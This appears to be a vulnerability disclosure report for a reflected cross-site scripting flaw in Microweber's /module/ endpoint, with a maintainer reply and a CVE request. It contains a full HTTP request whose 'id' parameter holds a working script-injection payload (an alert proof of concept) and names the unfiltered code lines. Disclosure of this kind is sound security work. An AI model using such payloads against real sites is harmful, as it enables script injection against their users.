Cross-site Scripting (XSS) - Reflected in microweber/microweber
Reported on
Jul 14th 2022
Description
Hi team, I found XSS at /module/.
Proof of Concept
Pop up POC:
Reflected POC:
Full request payload:
POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close
type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
Impact
XSS
Occurrences
index.php L80-L92
This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.
Hello,
Thanks for the report.
We cannot simulate this. Maybe it was fixed in the previous version.
Can you provide video of POC where the user can encounter this error ?
Hi Peter Ivanov, this is full video POC:
https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4
Maybe you should download images folder because the video is too big for github to display.
Hope you validate the issue.
Thank you, deshine
Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?
Happy to assign a CVE to this report if the maintainer gives their permission.
@maintainer?